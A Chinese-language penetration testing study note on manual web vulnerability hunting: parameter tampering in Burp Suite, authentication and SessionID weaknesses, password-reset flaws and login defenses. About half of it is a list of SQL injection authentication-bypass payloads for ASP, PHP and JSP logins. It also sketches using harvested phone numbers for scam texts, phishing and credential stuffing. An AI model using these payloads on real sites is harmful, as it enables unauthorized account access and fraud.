web 渗透 --- 手动挖掘漏洞
手动漏洞挖掘的原则
-
所有变量
-
所有头
Cookie的变量
-
逐个变量删除
先手动进行爬网,过滤只有参数的页面
将页面发送至repeater模块,进行变量的逐个修改或删除
burpsuit 中变量名为蓝色,值为红色,修改之后可以使用comparer模块进行比较
漏洞的本质
- 数据与指令的混淆
- 对用户输入信息过滤不严判断失误,误将指令当数据
身份认证漏洞
针对身份认证
- 使用常用弱口令/基于字典的密码暴力**
- 测试是否锁定账号
- 测试基于手机号的用户名**,可以在站内论坛收集用户信息
- 查看错误秘密提升信息,可以判断用户名或者密码错误
- 密码嗅探工具可以直接获取密码
会话 SessionID
- Xss / cookie importer
- SessionID in URL
- 使用嗅探工具.
- 测试 SessionID 是否是长期不变的
- 破译 SessionID 生成算法
• Sequencer
• 私有算法
• 预判下一次登录时生成的 SessionID
• 登出后返回测试
密码找回时的漏洞
- 在 URL 中存在密码的散列值,可以直接进行密码设置
登录界面
- 暴力**
- SQL注入
- 万能密码(约等于SQL注入)
- 任意密码重置/任意用户注册
- 四位数的短信验证码
- 反馈过于详细
获取一个新用户的成本很高
如果我能得到公司的客户信息=手机号
- 假如我是竞争对手 给这些人发广告,告诉他们我这有好东西
- 假如我是做黑产的 给这些人发诈骗短信,钓鱼
- 撞库攻击
防御 用户名+手机号+短信验证码 相匹配
登录界面安全防御:
- 使用HTTPS,加密post包的密码
- 使用验证码
- 错误尝试5次后,锁定账户30分钟
- 高强度密码
万能密码:
asp、aspx、php、jsp万能密码大全
asp aspx万能密码
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11:1 or '1'='1'=1
12:1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15:'xor
16: 用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)
密码 1
17..admin' or 'a'='a 密码随便
PHP万能密码
'or 1=1/*
User: something
Pass: ' or '1'='1
jsp 万能密码
1'or'1'='1
admin' or 1=1/*